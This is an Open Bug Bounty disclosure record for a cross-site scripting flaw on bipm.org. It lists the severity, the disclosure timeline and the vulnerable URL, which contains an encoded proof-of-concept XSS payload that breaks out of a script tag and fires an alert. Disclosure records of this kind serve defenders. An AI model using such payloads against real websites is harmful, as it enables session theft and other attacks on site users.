bipm.org XSS vulnerability

2016-05-22T03:34:00
ID OBB:155070
Type openbugbounty
Reporter et
Modified 2018-03-15T02:24:00

Description

Open Bug Bounty ID: OBB-155070

Description| Value
---|---
Affected Website:| bipm.org
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.bipm.org/exalead_kcdb/exa_kcdb.jsp?_z=1%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3E1/_z=2&_C=eJw9i9EKAiEQRed*Iphx1NHH2uilxz5AxIRdcF2rLfr8sqCXy!EeTiiQK4RnhdNw2Idda7leptcAYWnrtNQ70B*POd7S2I*YACGUuXP77hVSrnGGkGBL5Kx21qAlb9CLVdp1sSFDokUJKXZinVZW80!IkGb8OI!snGHuxTitx0cpoBDecBQrFA__&_p=AppC
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 22 May, 2016 03:34 GMT
Vulnerability Verified:| 22 May, 2016 03:36 GMT
Website Operator Notified:| 22 May, 2016 03:36 GMT
Vulnerability Published:| 22 May, 2016 03:36 GMT[without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:24 GMT
Public Disclosure:| 15 March, 2018 02:24 GMT